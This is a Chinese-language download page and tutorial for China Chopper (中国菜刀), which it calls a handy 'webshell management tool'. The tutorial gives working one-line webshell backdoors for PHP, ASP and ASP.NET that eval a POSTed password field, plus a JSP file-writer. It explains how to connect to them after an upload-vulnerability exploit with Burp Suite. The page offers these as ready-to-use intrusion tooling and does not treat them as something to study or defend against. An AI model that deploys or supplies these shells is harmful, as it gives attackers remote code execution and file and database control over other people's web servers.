中国菜刀(附详细使用教程)

2020 年 8 月 24 日3290

中国菜刀,不是原来切菜做饭的道具,而是一款专业的webshell管理工具,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用时,自动切换到英文界面。

webshell管理工具好用吗

中国菜刀功能特色

在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,

保存后即可使用文件管理,虚拟终端,数据库管理,自写脚本几大块功能。

1.文件管理:缓存下载目录,并支持离线查看缓存目录,上传下载修改文件,比ftp要好吧!

2.虚拟终端:人性化的设计,操作方便;(输入HELP查看更多用法)

3.数据库管理:图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS支持ADO方式连接的数据库。

4.网站蜘蛛功能:织出一张网站的目录结构。下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。

5.定时提醒:当闹钟来使吧, 周期:每月/每周/每日/只一次。

6.快速启动:一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。

7.浏览器:地址栏输入HELP

8.自定义服务端代码:通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。 如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本可以在官网下载别人的CCC脚本,或分享你的得意之作。‍‍

注意:由于服务器的安全设置,某些功能可能不能正常使用。

webshell管理工具怎么用

中国菜刀详细使用教程

1、打开中国菜刀客户端

2、在服务端运行的代码如下:

PHP: <?php @eval($_POST['pass']);?>

ASP: <%eval request(“pass”)%>

ASP.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>

JSP:<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>

(注意: ASP.NET要单独一个文件或此文件也是Jscript语言)

叉叉之前在上传漏洞演示,利用burpsuite抓包改包上传最后讲到用菜刀连接,看看是怎么实现的:

在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(这个必须要),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了.

3、点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!

操作效果截图:

PC官方版
安卓官方手机版
IOS官方手机版

0 0